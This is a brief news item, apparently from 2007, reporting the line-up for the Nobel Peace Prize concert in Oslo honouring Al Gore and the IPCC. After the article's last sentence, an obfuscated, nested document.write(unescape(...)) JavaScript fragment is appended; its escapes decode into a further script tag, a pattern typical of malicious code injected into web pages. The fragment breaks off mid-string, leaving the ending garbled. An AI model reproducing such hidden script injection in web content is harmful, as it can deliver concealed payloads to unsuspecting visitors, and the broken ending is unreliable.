Alicia Keys and Annie Lennox have signed up to perform at the annual Nobel Peace Prize concert in Norway.
The singers will join Earth Wind and Fire, Melissa Etheridge and KT Tunstall on the bill for the Oslo event on December 11.
Geir Lundestad, secretary of the Norwegian Nobel Committee, said: "The Nobel Committee is pleased to welcome such a talented and eclectic group of artists for this momentous occasion."
The concert is held each year a day after the awards ceremony itself.
This year's Nobel Peace Prize will be awarded to former US Vice President Al Gore and the United Nation's Intergovernmental Panel on Climate Change for their efforts to spread awareness about global warning.
Winners are allowed to invite one performer of their choice. Gore picked 'I Need to Wake Up' singer Etheridge after she featured in his environmental documentary 'An Inconvenient Truth' last year.
The organisers of the Nobel Peace Prize concert have promised to announce further performers in the next few weeks.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
